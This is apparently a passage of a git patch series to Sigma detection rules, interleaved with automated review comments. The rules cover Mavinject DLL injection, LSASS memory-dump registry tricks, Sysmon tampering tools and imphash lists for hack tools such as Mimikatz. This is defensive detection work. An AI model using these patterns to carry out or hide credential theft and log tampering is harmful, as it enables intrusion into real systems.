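Review bot: `selection_domain` does not test for an IP address at all: `Contents|contains` with `'1.'` … `'9.'` matches any Zone.Identifier stream whose text contains a digit followed by a dot, which includes ordinary host names with numeric labels (`cdn1.`, `s3.`) and version fragments in a URL path, so at `level: high` this rule will fire on a large share of all browser downloads. If the target backends support it, the check should be a regex on the URL prefix, constructed example: `Contents|re: 'HostUrl=https?://\d{1,3}(\.\d{1,3}){3}'`, otherwise the rule needs at least a literal `HostUrl=http://` / `HostUrl=https://` anchor combined with the digit-dot substrings so the match is confined to the host part. The follow-up hunk at L34 renames the title and drops the `':Zone'` entry but keeps the same `selection_domain`, so the issue persists there; the `description` should also say what "URLs with IP" means once the logic is fixed.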
@@ -1,40 +1,45 @@
 title: Mavinject Inject DLL Into Running Process
 id: 4f73421b-5a0b-4bbf-a892-5a7fb99bea66
+related:
+ - id: 17eb8e57-9983-420d-ad8a-2c4976c22eb8
+ type: obsoletes
 status: experimental
-author: frack113
+author: frack113, Florian Roth
 date: 2021/07/12
-modified: 2022/07/11
-description: Injects arbitrary DLL into running process specified by process ID. Requires Windows 10.
+modified: 2022/09/07
+description: Detects process injection using the signed Windows tool "Mavinject" via the "INJECTRUNNING" flag or a renamed execution of the tool
 references:
 - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md
 - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1056.004/T1056.004.md
 - https://posts.specterops.io/mavinject-exe-functionality-deconstructed-c29ab2cf5c0e
+ - https://twitter.com/gN3mes1s/status/941315826107510784
+ - https://reaqta.com/2017/12/mavinject-microsoft-injector/
+ - https://twitter.com/Hexacorn/status/776122138063409152 # Deleted tweet
 tags:
 - attack.defense_evasion
- - attack.collection
+ - attack.privilege_escalation
+ - attack.t1055.001
 - attack.t1218.013
- - attack.t1056.004
 logsource:
 category: process_creation
 product: windows
 detection:
- selection_cli:
- CommandLine|contains|all:
- - ' /INJECTRUNNING'
- - '.dll' # space some time in the end
- selection_img:
- - OriginalFileName:
+ selection_flag:
+ CommandLine|contains: ' /INJECTRUNNING '
+ selection_renamed:
+ OriginalFileName:
 - 'mavinject32.exe'
 - 'mavinject64.exe'
- - Image|endswith: # Event 4688 doesn't have the OriginalFileName field
+ filter_renamed:
+ Image|endswith:
 - '\mavinject32.exe'
 - '\mavinject64.exe'
- condition: all of selection_*
+ condition: selection_flag or (selection_renamed and not filter_renamed)
 fields:
 - ComputerName
 - User
 - CommandLine
 - ParentCommandLine
 falsepositives:
- - Unknown
-level: medium
+ - Unlikely
+level: high
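Review bot: `filter_renamed` only exempts images named `\mavinject32.exe` and `\mavinject64.exe`, but the copy that ships in `System32` is named `mavinject.exe`; if that binary reports `OriginalFileName: mavinject32.exe` (which is my recollection, and should be confirmed against a process-creation event from a stock Windows 10 host), every legitimate launch of the built-in tool satisfies `selection_renamed and not filter_renamed` and the rule fires at `level: high` with `falsepositives: Unlikely`. Adding `- '\mavinject.exe'` to the `Image|endswith` list of `filter_renamed` closes that gap. The removed comment `# Event 4688 doesn't have the OriginalFileName field` described a real limitation that the new `selection_renamed` still has, namely that the renamed-binary branch is only evaluable on Sysmon-style telemetry, and that caveat should survive as a comment on `selection_renamed` rather than be dropped.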
diff --git a/rules/windows/process_creation/proc_creation_win_mavinject_proc_inj.yml b/rules/windows/process_creation/proc_creation_win_mavinject_proc_inj.yml
deleted file mode 100644
index 632e3ef71..000000000
--- a/rules/windows/process_creation/proc_creation_win_mavinject_proc_inj.yml
+++ /dev/null
@@ -1,24 +0,0 @@
-title: MavInject Process Injection
-id: 17eb8e57-9983-420d-ad8a-2c4976c22eb8
-status: stable
-description: Detects process injection using the signed Windows tool Mavinject32.exe
-author: Florian Roth
-references:
- - https://twitter.com/gN3mes1s/status/941315826107510784
- - https://reaqta.com/2017/12/mavinject-microsoft-injector/
- - https://twitter.com/Hexacorn/status/776122138063409152
-date: 2018/12/12
-modified: 2021/11/27
-logsource:
- category: process_creation
- product: windows
-detection:
- selection:
- CommandLine|contains: ' /INJECTRUNNING '
- condition: selection
-falsepositives:
- - Unknown
-level: high
-tags:
- - attack.t1055.001
- - attack.t1218
diff --git a/rules/windows/registry/registry_event/registry_event_silentprocessexit_lsass.yml b/rules/windows/registry/registry_event/registry_event_silentprocessexit_lsass.yml
index 18f83195a..b1a0279f3 100644
--- a/rules/windows/registry/registry_event/registry_event_silentprocessexit_lsass.yml
+++ b/rules/windows/registry/registry_event/registry_event_silentprocessexit_lsass.yml
@@ -1,12 +1,16 @@
-title: SilentProcessExit Monitor Registrytion for LSASS
+title: SilentProcessExit Monitor Registration for LSASS
 id: 55e29995-75e7-451a-bef0-6225e2f13597
-description: Detects changes to the Registry in which a monitor program gets registered to dump process memory of the lsass.exe process memory
+related:
+ - id: 1f24c7c1-0b71-4e4e-8a6d-f863c9d8aa4a
+ type: similar
+description: Detects changes to the Registry in which a monitor program gets registered to dump the memory of the lsass.exe process
 status: experimental
 author: Florian Roth
 references:
 - https://www.deepinstinct.com/2021/02/16/lsass-memory-dumps-are-stealthier-than-ever-before-part-2/
 - https://oddvar.moe/2018/04/10/persistence-using-globalflags-in-image-file-execution-options-hidden-from-autoruns-exe/
 date: 2021/02/26
+modified: 2022/09/07
 tags:
 - attack.credential_access
 - attack.t1003.007
@@ -14,9 +18,9 @@ logsource:
 category: registry_event
 product: windows
 detection:
- selection:
+ selection:
 TargetObject|contains: 'Microsoft\Windows NT\CurrentVersion\SilentProcessExit\lsass.exe'
 condition: selection
 falsepositives:
- - Unknown
-level: critical
\ No newline at end of file
+ - Unlikely
+level: critical
diff --git a/rules/windows/registry/registry_set/registry_set_globalflags_persistence.yml b/rules/windows/registry/registry_set/registry_set_globalflags_persistence.yml
index ec2ae7a02..1837b12e6 100755
--- a/rules/windows/registry/registry_set/registry_set_globalflags_persistence.yml
+++ b/rules/windows/registry/registry_set/registry_set_globalflags_persistence.yml
@@ -1,35 +1,35 @@
 title: GlobalFlags Registry Persistence Mechanisms
 id: 36803969-5421-41ec-b92f-8500f79c23b0
 status: test
-description: Detects persistence using GlobalFlags in image file executiobn options
+description: Detects persistence using GlobalFlags in image file execution options
 author: Karneades, Jonhnathan Ribeiro
 references:
- - https://oddvar.moe/2018/04/10/persistence-using-globalflags-in-image-file-execution-options-hidden-from-autoruns-exe/
+ - https://oddvar.moe/2018/04/10/persistence-using-globalflags-in-image-file-execution-options-hidden-from-autoruns-exe/
 date: 2018/04/11
-modified: 2022/03/26
+modified: 2022/09/07
 logsource:
- category: registry_set
- product: windows
+ category: registry_set
+ product: windows
 detection:
- selection_reg1:
- TargetObject|contains: '\SOFTWARE\Microsoft\Windows NT\CurrentVersion'
- selection_reg2:
- - TargetObject|contains|all:
- - '\Image File Execution Options\'
- - '\GlobalFlag'
- - TargetObject|contains|all:
- - 'SilentProcessExit\'
- - '\ReportingMode'
- - TargetObject|contains|all:
- - 'SilentProcessExit\'
- - '\MonitorProcess'
- condition: selection_reg1 and selection_reg2
+ selection_reg1:
+ TargetObject|contains: '\Microsoft\Windows NT\CurrentVersion\'
+ selection_reg2:
+ - TargetObject|contains|all:
+ - '\Image File Execution Options\'
+ - '\GlobalFlag'
+ - TargetObject|contains|all:
+ - 'SilentProcessExit\'
+ - '\ReportingMode'
+ - TargetObject|contains|all:
+ - 'SilentProcessExit\'
+ - '\MonitorProcess'
+ condition: all of selection_*
 falsepositives:
- - Unknown
+ - Unknown
 level: high
 tags:
- - attack.privilege_escalation
- - attack.persistence
- - attack.defense_evasion
- - attack.t1546.012
- - car.2013-01-002
+ - attack.privilege_escalation
+ - attack.persistence
+ - attack.defense_evasion
+ - attack.t1546.012
+ - car.2013-01-002
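Review bot: This hunk mixes a whole-file re-indentation with two logic changes (`selection_reg1` loosened from `'\SOFTWARE\Microsoft\Windows NT\CurrentVersion'` to `'\Microsoft\Windows NT\CurrentVersion\'`, and the condition rewritten as `all of selection_*`), which makes the behavioural change hard to see in review; splitting formatting from logic into separate commits is the usual convention. The loosened prefix is a deliberate widening (it now also matches the `WOW6432Node` mirror path), and that intent deserves a comment such as `# no leading \SOFTWARE so the WOW6432Node mirror keys are covered too`. The two `'SilentProcessExit\'` entries lack the leading backslash that every sibling value in the same list carries; `'\SilentProcessExit\'` would make the style uniform and avoids matching a key name that merely ends in those characters.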
diff --git a/rules/windows/registry/registry_set/registry_set_silentprocessexit.yml b/rules/windows/registry/registry_set/registry_set_silentprocessexit.yml
index 8766c4a55..8d398a926 100644
--- a/rules/windows/registry/registry_set/registry_set_silentprocessexit.yml
+++ b/rules/windows/registry/registry_set/registry_set_silentprocessexit.yml
@@ -1,4 +1,4 @@
-title: SilentProcessExit Monitor Registrytion
+title: SilentProcessExit Monitor Registration
 id: c81fe886-cac0-4913-a511-2822d72ff505
 description: Detects changes to the Registry in which a monitor program gets registered to monitor the exit of another process
 status: experimental
From df257caa4ca4b9cccff35a63e4f95d36b7ac77ad Mon Sep 17 00:00:00 2001
From: Nasreddine Bencherchali <8741929+nasbench@users.noreply.github.com>
Date: Wed, 7 Sep 2022 12:17:18 +0200
Subject: [PATCH 25/73] Update create_stream_hash_susp_ip_domains.yml
---
 .../create_stream_hash_susp_ip_domains.yml | 5 ++---
 1 file changed, 2 insertions(+), 3 deletions(-)
diff --git a/rules/windows/create_stream_hash/create_stream_hash_susp_ip_domains.yml b/rules/windows/create_stream_hash/create_stream_hash_susp_ip_domains.yml
index c68a9ce6b..fb83898d4 100644
--- a/rules/windows/create_stream_hash/create_stream_hash_susp_ip_domains.yml
+++ b/rules/windows/create_stream_hash/create_stream_hash_susp_ip_domains.yml
@@ -1,5 +1,5 @@
-title: Unusual File Download from File Sharing Domain
-id: ae02ed70-11aa-4a22-b397-c0d0e8f6ea99
+title: Unusual File Download from Direct IP Address
+id: 025bd229-fd1f-4fdb-97ab-20006e1a5368
 status: experimental
 description: Detects the download of suspicious file type from URLs with IP
 author: Nasreddine Bencherchali
@@ -29,7 +29,6 @@ detection:
 - '.vbe:Zone'
 - '.vbs:Zone'
 - '.dll:Zone'
- - ':Zone' # No extension
 condition: all of selection*
 falsepositives:
 - Unknown
From bdccc5440a77e13394272cad707b722e37252092 Mon Sep 17 00:00:00 2001
From: Qasim Qlf <30376573+qasimqlf@users.noreply.github.com>
Date: Wed, 7 Sep 2022 15:28:06 +0500
Subject: [PATCH 26/73] Update proc_creation_win_bad_opsec_sacrificial_processes.yml
---
 ..._creation_win_bad_opsec_sacrificial_processes.yml | 12 ++++++------
 1 file changed, 6 insertions(+), 6 deletions(-)
diff --git a/rules/windows/process_creation/proc_creation_win_bad_opsec_sacrificial_processes.yml b/rules/windows/process_creation/proc_creation_win_bad_opsec_sacrificial_processes.yml
index ed0ee3f1d..edf67e4fa 100644
--- a/rules/windows/process_creation/proc_creation_win_bad_opsec_sacrificial_processes.yml
+++ b/rules/windows/process_creation/proc_creation_win_bad_opsec_sacrificial_processes.yml
@@ -7,7 +7,7 @@ related:
 description: 'Detects attackers using tooling with bad opsec defaults e.g. spawning a sacrificial process to inject a capability into the process without taking into account how the process is normally run, one trivial example of this is using rundll32.exe without arguments as a sacrificial process (default in CS, now highlighted by c2lint), running WerFault without arguments (Kraken - credit am0nsec), and other examples.'
 author: Oleg Kolesnikov @securonix invrep_de, oscd.community, Florian Roth, Christian Burkard
 date: 2020/10/23
-modified: 2021/09/01
+modified: 2022/09/07
 references:
 - https://blog.malwarebytes.com/malwarebytes-news/2020/10/kraken-attack-abuses-wer-service/
 - https://www.cobaltstrike.com/help-opsec
@@ -25,19 +25,19 @@ logsource:
 detection:
 selection1:
 Image|endswith: '\WerFault.exe'
- CommandLine|endswith: '\WerFault.exe'
+ CommandLine|endswith: 'WerFault.exe'
 selection2:
 Image|endswith: '\rundll32.exe'
- CommandLine|endswith: '\rundll32.exe'
+ CommandLine|endswith: 'rundll32.exe'
 selection3:
 Image|endswith: '\regsvcs.exe'
- CommandLine|endswith: '\regsvcs.exe'
+ CommandLine|endswith: 'regsvcs.exe'
 selection4:
 Image|endswith: '\regasm.exe'
- CommandLine|endswith: '\regasm.exe'
+ CommandLine|endswith: 'regasm.exe'
 selection5:
 Image|endswith: '\regsvr32.exe'
- CommandLine|endswith: '\regsvr32.exe'
+ CommandLine|endswith: 'regsvr32.exe'
 condition: 1 of selection*
 fields:
 - ParentImage
From c6dc31fb48074578aac45f3c5072be347873a48a Mon Sep 17 00:00:00 2001
From: Nasreddine Bencherchali <8741929+nasbench@users.noreply.github.com>
Date: Wed, 7 Sep 2022 14:07:04 +0200
Subject: [PATCH 27/73] Remove duplicate casing
Removed cased names as SIGMA is case insensitive and the logs should searched case insensitively
---
 .../file_event_win_creation_system_file.yml | 12 ++++--------
 1 file changed, 4 insertions(+), 8 deletions(-)
diff --git a/rules/windows/file_event/file_event_win_creation_system_file.yml b/rules/windows/file_event/file_event_win_creation_system_file.yml
index 099155e1d..d2e7cb5ca 100755
--- a/rules/windows/file_event/file_event_win_creation_system_file.yml
+++ b/rules/windows/file_event/file_event_win_creation_system_file.yml
@@ -4,7 +4,7 @@ status: test
 description: Detects the creation of an executable with a system process name in a suspicious folder
 author: Sander Wiebing, Tim Shelton
 date: 2020/05/26
-modified: 2022/07/27
+modified: 2022/09/07
 tags:
 - attack.defense_evasion
 - attack.t1036.005
@@ -31,10 +31,8 @@ detection:
 - '\explorer.exe'
 - '\taskhost.exe'
 - '\Taskmgr.exe'
- - '\taskmgr.exe'
 - '\sihost.exe'
 - '\RuntimeBroker.exe'
- - '\runtimebroker.exe'
 - '\smartscreen.exe'
 - '\dllhost.exe'
 - '\audiodg.exe'
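Review bot: Dropping the backslash from each `CommandLine|endswith` value so that a bare `rundll32.exe` (no path, no arguments) is matched is the right direction, but the rewritten values still miss the quoted form that the Windows shell and many launchers produce, a command line ending in `rundll32.exe"`; for each selection the value should become a list, e.g. `CommandLine|endswith:` / `  - 'rundll32.exe'` / `  - 'rundll32.exe"'`, so that both spellings of an argument-less sacrificial process are caught (the other four selections need the same treatment). The commit title says only "Update", and the reason for the relaxation, argument-less spawns that give the bare file name rather than a path, is not recorded anywhere in the rule; a comment on `selection1` such as `# no leading backslash: sacrificial spawns often use the bare file name without a path` would preserve that reasoning. The enclosing `detection` block starts above this hunk.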
@@ -42,13 +40,10 @@ detection:
 filter1:
 TargetFilename|startswith:
 - 'C:\Windows\System32\'
- - 'C:\Windows\system32\'
- - 'C:\Windows\SysWow64\'
 - 'C:\Windows\SysWOW64\'
- - 'C:\Windows\winsxs\'
 - 'C:\Windows\WinSxS\'
 - '\SystemRoot\System32\'
- Image|endswith:
+ Image|endswith:
 - '\Windows\System32\dism.exe'
 - '\TiWorker.exe'
 filter2:
@@ -67,5 +62,6 @@ detection:
 fields:
 - Image
 falsepositives:
- - System processes copied outside the default folder
+ - System processes copied outside their default folders for testing purposes
+ - Third party software naming their software with the same names as the processes mentioned here
 level: high
From 88e9794a74251934f0e5b91973ebf0935a959ae2 Mon Sep 17 00:00:00 2001
From: Nasreddine Bencherchali <8741929+nasbench@users.noreply.github.com>
Date: Wed, 7 Sep 2022 14:15:10 +0200
Subject: [PATCH 28/73] Update proc_creation_win_system_exe_anomaly.yml
---
 .../process_creation/proc_creation_win_system_exe_anomaly.yml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/rules/windows/process_creation/proc_creation_win_system_exe_anomaly.yml b/rules/windows/process_creation/proc_creation_win_system_exe_anomaly.yml
index 6113dbc86..fbc66ccbf 100644
--- a/rules/windows/process_creation/proc_creation_win_system_exe_anomaly.yml
+++ b/rules/windows/process_creation/proc_creation_win_system_exe_anomaly.yml
@@ -69,7 +69,7 @@ detection:
 - 'C:\Windows\System32\'
 - 'C:\Windows\SysWOW64\'
 - 'C:\Windows\WinSxS\'
- - 'C:\avast! sandbox'
+ # - 'C:\avast! sandbox'
 - Image|contains: '\SystemRoot\System32\'
 - Image: 'C:\Windows\explorer.exe'
 condition: selection and not filter
From 6ad167a4f31e2aeeccf2ef753551f7cbbbf031ac Mon Sep 17 00:00:00 2001
From: Florian Roth
Date: Wed, 7 Sep 2022 14:33:44 +0200
Subject: [PATCH 29/73] rule: SysmonEnte usage
---
 .../proc_access_win_hack_sysmonente.yml | 27 +++++++++++++++++++
 1 file changed, 27 insertions(+)
 create mode 100644 rules/windows/process_access/proc_access_win_hack_sysmonente.yml
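Review bot: In the `proc_creation_win_system_exe_anomaly.yml` hunk the `'C:\avast! sandbox'` filter entry is commented out rather than removed, which leaves dead configuration in a `filter` list and gives no hint whether the exclusion was wrong, obsolete, or merely disputed; either delete the line or replace the bare comment with one that records the reason, e.g. `# Avast sandbox path removed 2022/09: too broad an exclusion for a high-level rule — re-add only with a tighter path`. That rule's `modified` date is also not bumped by this change, unlike the `file_event_win_creation_system_file.yml` hunk on the same line. The enclosing `filter` of the `system_exe_anomaly` rule starts above the hunk, so I cannot see whether other sandbox-style exclusions remain there.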
diff --git a/rules/windows/process_access/proc_access_win_hack_sysmonente.yml b/rules/windows/process_access/proc_access_win_hack_sysmonente.yml
new file mode 100644
index 000000000..a1f838075
--- /dev/null
+++ b/rules/windows/process_access/proc_access_win_hack_sysmonente.yml
@@ -0,0 +1,27 @@
+title: SysmonEnte Usage
+id: d29ada0f-af45-4f27-8f32-f7b77c3dbc4e
+status: experimental
+description: Detects the use of SysmonEnte, a tool to attack the integrity of Sysmon
+author: Florian Roth
+references:
+ - https://codewhitesec.blogspot.com/2022/09/attacks-on-sysmon-revisited-sysmonente.html
+ - https://github.com/codewhitesec/SysmonEnte/
+ - https://github.com/codewhitesec/SysmonEnte/blob/main/screens/1.png
+date: 2022/09/07
+logsource:
+ category: process_access
+ product: windows
+detection:
+ selection_1:
+ TargetImage: 'C:\Windows\Sysmon64.exe'
+ GrantedAccess: '0x1400'
+ filter_1:
+ SourceImage|startswith:
+ - 'C:\Program Files'
+ - 'C:\Windows\System32\'
+ selection_calltrace:
+ CallTrace: 'Ente'
+ condition: ( selection_1 and not filter_1 ) or selection_calltrace
+falsepositives:
+ - Unknown
+level: high
From 6f1ff59027113d6f06b2d092aed0a4f15dc18911 Mon Sep 17 00:00:00 2001
From: Florian Roth
Date: Wed, 7 Sep 2022 15:29:09 +0200
Subject: [PATCH 30/73] SysmonEnte Hashes
---
 .../create_stream_hash/create_stream_hash_hacktool_download.yml | 2 ++
 1 file changed, 2 insertions(+)
diff --git a/rules/windows/create_stream_hash/create_stream_hash_hacktool_download.yml b/rules/windows/create_stream_hash/create_stream_hash_hacktool_download.yml
index abf998846..5a7d6dcd5 100644
--- a/rules/windows/create_stream_hash/create_stream_hash_hacktool_download.yml
+++ b/rules/windows/create_stream_hash/create_stream_hash_hacktool_download.yml
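Review bot: `CallTrace: 'Ente'` without a modifier is an exact, whole-field comparison in Sigma, and a Sysmon process-access `CallTrace` is a multi-frame string, so this selection can only match if the tool leaves the entire field as the literal `Ente`; unless the referenced screenshot shows exactly that, it should read `CallTrace|contains: 'Ente'` (or `|endswith`, depending on where the marker appears in the observed trace). `TargetImage: 'C:\Windows\Sysmon64.exe'` pins the default 64-bit install path; 32-bit installs and deployments that rename or relocate the Sysmon binary, a common hardening step, will never hit `selection_1`, which should at least be stated in the rule, e.g. `# adjust TargetImage if Sysmon is installed under a custom name/path`. `filter_1` excludes any source image under `C:\Program Files` by prefix alone, which is a wide exemption for a rule about tampering with the sensor; narrowing it to the specific vendor directories that legitimately open Sysmon with `0x1400` would keep the filter honest. The patch at L40 touches this file again, but that hunk is outside this view.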
@@ -78,6 +78,7 @@ detection:
 - 2a1bc4913cd5ecb0434df07cb675b798 # DripLoader
 - 11083e75553baae21dc89ce8f9a195e4 # DripLoader
 - a23d29c9e566f2fa8ffbb79267f5df80 # DripLoader
+ - 84B763C45C0E4A3E7CA5548C710DB4EE # SysmonEnte
 - Hashes|contains: # Sysmon field hashes contains all types
 - IMPHASH=BCCA3C247B619DCD13C8CDFF5F123932 # PetitPotam
 - IMPHASH=3A19059BD7688CB88E70005F18EFC439 # PetitPotam
@@ -144,6 +145,7 @@ detection:
 - IMPHASH=2A1BC4913CD5ECB0434DF07CB675B798 # DripLoader
 - IMPHASH=11083E75553BAAE21DC89CE8F9A195E4 # DripLoader
 - IMPHASH=A23D29C9E566F2FA8FFBB79267F5DF80 # DripLoader
+ - IMPHASH=84B763C45C0E4A3E7CA5548C710DB4EE # SysmonEnte
 condition: selection
 fields:
 - TargetFilename
From b293a7a1811771cabd079bd5ceb5b0073d1d4f04 Mon Sep 17 00:00:00 2001
From: Florian Roth
Date: Wed, 7 Sep 2022 16:01:05 +0200
Subject: [PATCH 31/73] refactor: SysmonEnte, SharpEvtMute, SysmonQuiet
---
 .../create_stream_hash_hacktool_download.yml | 4 ++++
 ...image_load_sysmon_disable_sharpevtmute.yml | 22 +++++++++++++++++++
 .../proc_access_win_hack_sysmonente.yml | 3 +++
 3 files changed, 29 insertions(+)
 create mode 100644 rules/windows/image_load/image_load_sysmon_disable_sharpevtmute.yml
diff --git a/rules/windows/create_stream_hash/create_stream_hash_hacktool_download.yml b/rules/windows/create_stream_hash/create_stream_hash_hacktool_download.yml
index 5a7d6dcd5..1d31bc1ea 100644
--- a/rules/windows/create_stream_hash/create_stream_hash_hacktool_download.yml
+++ b/rules/windows/create_stream_hash/create_stream_hash_hacktool_download.yml
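Review bot: The new `Imphash` entry `84B763C45C0E4A3E7CA5548C710DB4EE # SysmonEnte` is the only uppercase value in a list where every other hash is lowercase. Sigma semantics are case-insensitive, but a backend that maps `Imphash` onto a case-sensitive keyword field may then match only one spelling, and the rule already keeps two conventions (lowercase in `Imphash`, uppercase `IMPHASH=` in `Hashes|contains` as Sysmon emits it), so the entry should be `84b763c45c0e4a3e7ca5548c710db4ee` to stay consistent within its list. A short comment naming which SysmonEnte artefact (release build or self-compiled) produced the hash would also help, since an import hash changes with every toolchain or added import and a single value is cheap for an attacker to shake off.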
@@ -79,6 +79,8 @@ detection:
 - 11083e75553baae21dc89ce8f9a195e4 # DripLoader
 - a23d29c9e566f2fa8ffbb79267f5df80 # DripLoader
 - 84B763C45C0E4A3E7CA5548C710DB4EE # SysmonEnte
+ - 19584675d94829987952432e018d5056 # SysmonQuiet
+ - 330768a4f172e10acb6287b87289d83b # ShaprEvtMute Hook
 - Hashes|contains: # Sysmon field hashes contains all types
 - IMPHASH=BCCA3C247B619DCD13C8CDFF5F123932 # PetitPotam
 - IMPHASH=3A19059BD7688CB88E70005F18EFC439 # PetitPotam
@@ -146,6 +148,8 @@ detection:
 - IMPHASH=11083E75553BAAE21DC89CE8F9A195E4 # DripLoader
 - IMPHASH=A23D29C9E566F2FA8FFBB79267F5DF80 # DripLoader
 - IMPHASH=84B763C45C0E4A3E7CA5548C710DB4EE # SysmonEnte
+ - IMPHASH=19584675D94829987952432E018D5056 # SysmonQuiet
+ - IMPHASH=330768A4F172E10ACB6287B87289D83B # ShaprEvtMute Hook
 condition: selection
 fields:
 - TargetFilename
diff --git a/rules/windows/image_load/image_load_sysmon_disable_sharpevtmute.yml b/rules/windows/image_load/image_load_sysmon_disable_sharpevtmute.yml
new file mode 100644
index 000000000..8c3617ae1
--- /dev/null
+++ b/rules/windows/image_load/image_load_sysmon_disable_sharpevtmute.yml
@@ -0,0 +1,22 @@
+title: SharpEvtMute EvtMuteHook Load
+id: bedfc8ad-d1c7-4e37-a20e-e2b0dbee759c
+status: experimental
+description: Detects the load of EvtMuteHook.dll, a key component of SharpEvtHook, a tool to tamper with Windows event logs
+references:
+ - https://github.com/bats3c/EvtMute
+tags:
+ - attack.defense_evasion
+ - attack.t1562.002
+author: Florian Roth
+date: 2022/09/07
+logsource:
+ category: image_load
+ product: windows
+detection:
+ selection:
+ - Hashes|contains: 'IMPHASH=330768A4F172E10ACB6287B87289D83B'
+ - Imphash: '330768a4f172e10acb6287b87289d83b'
+ condition: selection
+falsepositives:
+ - Other DLLs with that import hash
+level: high
diff --git a/rules/windows/process_access/proc_access_win_hack_sysmonente.yml b/rules/windows/process_access/proc_access_win_hack_sysmonente.yml
index a1f838075..e999257ec 100644
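Review bot: The new rule's description says `a key component of SharpEvtHook`, but the title, the filename and the bats3c/EvtMute reference all name the tool SharpEvtMute, so it should read `a key component of SharpEvtMute`. The detection keys only on one import hash, which disappears as soon as the DLL is recompiled with any extra import, while the description promises to detect the load of EvtMuteHook.dll; adding a third alternative to the `selection` list, `- ImageLoaded|endswith: '\EvtMuteHook.dll'`, catches the unmodified release even on hosts whose Sysmon config does not log IMPHASH, and the `falsepositives` entry would then need a line for renamed DLLs too. The comment `# ShaprEvtMute Hook` on the two hash lines added to the create_stream_hash rule in the same commit is a typo for SharpEvtMute.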
--- a/rules/windows/process_access/proc_access_win_hack_sysmonente.yml
+++ b/rules/windows/process_access/proc_access_win_hack_sysmonente.yml
@@ -8,6 +8,9 @@ references:
 - https://github.com/codewhitesec/SysmonEnte/
 - https://github.com/codewhitesec/SysmonEnte/blob/main/screens/1.png
 date: 2022/09/07
+tags:
+ - attack.defense_evasion
+ - attack.t1562.002
 logsource:
 category: process_access
 product: windows
From 2ac92283e61f1e8e4324184796b1b0060cfc7d11 Mon Sep 17 00:00:00 2001
From: Florian Roth
Date: Wed, 7 Sep 2022 16:05:48 +0200
Subject: [PATCH 32/73] indentation and new hashes
---
 .../create_stream_hash_hacktool_download.yml | 347 +++++++++--------
 .../proc_creation_win_hacktool_imphashes.yml | 358 +++++++++---------
 2 files changed, 374 insertions(+), 331 deletions(-)
diff --git a/rules/windows/create_stream_hash/create_stream_hash_hacktool_download.yml b/rules/windows/create_stream_hash/create_stream_hash_hacktool_download.yml
index 1d31bc1ea..d3d23db50 100644
--- a/rules/windows/create_stream_hash/create_stream_hash_hacktool_download.yml
+++ b/rules/windows/create_stream_hash/create_stream_hash_hacktool_download.yml
@@ -4,160 +4,197 @@ status: experimental description: Detects the creation of a file on disk that has an imphash of a well-known hack tool author: Florian Roth references: - - https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventid=90015 + - https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventid=90015 date: 2022/08/24 -logsource: - product: windows - category: create_stream_hash - definition: 'Requirements: Sysmon config with Imphash logging activated' -detection: - selection: - - Imphash: - - bcca3c247b619dcd13c8cdff5f123932 # PetitPotam - - 3a19059bd7688cb88e70005f18efc439 # PetitPotam - - bf6223a49e45d99094406777eb6004ba # PetitPotam - - 0c106686a31bfe2ba931ae1cf6e9dbc6 # Mimikatz - - 0d1447d4b3259b3c2a1d4cfb7ece13c3 # Mimikatz - - 1b0369a1e06271833f78ffa70ffb4eaf # Mimikatz - - 4c1b52a19748428e51b14c278d0f58e3 # Mimikatz - - 4d927a711f77d62cebd4f322cb57ec6f # Mimikatz - - 66ee036df5fc1004d9ed5e9a94a1086a # Mimikatz - - 672b13f4a0b6f27d29065123fe882dfc # Mimikatz - - 6bbd59cea665c4afcc2814c1327ec91f # Mimikatz - - 725bb81dc24214f6ecacc0cfb36ad30d # Mimikatz - - 9528a0e91e28fbb88ad433feabca2456 # Mimikatz - - 9da6d5d77be11712527dcab86df449a3 # Mimikatz - - a6e01bc1ab89f8d91d9eab72032aae88 # Mimikatz - - b24c5eddaea4fe50c6a96a2a133521e4 # Mimikatz - - d21bbc50dcc169d7b4d0f01962793154 # Mimikatz - - fcc251cceae90d22c392215cc9a2d5d6 # Mimikatz - - 23867a89c2b8fc733be6cf5ef902f2d1 # JuicyPotato - - a37ff327f8d48e8a4d2f757e1b6e70bc # JuicyPotato - - 6118619783fc175bc7ebecff0769b46e # RoguePotato - - 959a83047e80ab68b368fdb3f4c6e4ea # RoguePotato - - 563233bfa169acc7892451f71ad5850a # RoguePotato - - 87575cb7a0e0700eb37f2e3668671a08 # RoguePotato - - 13f08707f759af6003837a150a371ba1 # Pwdump - - 1781f06048a7e58b323f0b9259be798b # Pwdump - - 233f85f2d4bc9d6521a6caae11a1e7f5 # Pwdump - - 24af2584cbf4d60bbe5c6d1b31b3be6d # Pwdump - - 632969ddf6dbf4e0f53424b75e4b91f2 # Pwdump - - 713c29b396b907ed71a72482759ed757 # 
Pwdump - - 749a7bb1f0b4c4455949c0b2bf7f9e9f # Pwdump - - 8628b2608957a6b0c6330ac3de28ce2e # Pwdump - - 8b114550386e31895dfab371e741123d # Pwdump - - 94cb940a1a6b65bed4d5a8f849ce9793 # PwDumpX - - 9d68781980370e00e0bd939ee5e6c141 # Pwdump - - b18a1401ff8f444056d29450fbc0a6ce # Pwdump - - cb567f9498452721d77a451374955f5f # Pwdump - - 730073214094cd328547bf1f72289752 # Htran - - 17b461a082950fc6332228572138b80c # Cobalt Strike beacons - - dc25ee78e2ef4d36faa0badf1e7461c9 # Cobalt Strike beacons - - 819b19d53ca6736448f9325a85736792 # Cobalt Strike beacons - - 829da329ce140d873b4a8bde2cbfaa7e # Cobalt Strike beacons - - c547f2e66061a8dffb6f5a3ff63c0a74 # PPLDump - - 0588081ab0e63ba785938467e1b10cca # PPLDump - - 0d9ec08bac6c07d9987dfd0f1506587c # NanoDump - - bc129092b71c89b4d4c8cdf8ea590b29 # NanoDump - - 4da924cf622d039d58bce71cdf05d242 # NanoDump - - e7a3a5c377e2d29324093377d7db1c66 # NanoDump - - 9a9dbec5c62f0380b4fa5fd31deffedf # NanoDump - - af8a3976ad71e5d5fdfb67ddb8dadfce # NanoDump - - 0c477898bbf137bbd6f2a54e3b805ff4 # NanoDump - - 0ca9f02b537bcea20d4ea5eb1a9fe338 # NanoDump - - 3ab3655e5a14d4eefc547f4781bf7f9e # NanoDump - - e6f9d5152da699934b30daab206471f6 # NanoDump - - 3ad59991ccf1d67339b319b15a41b35d # 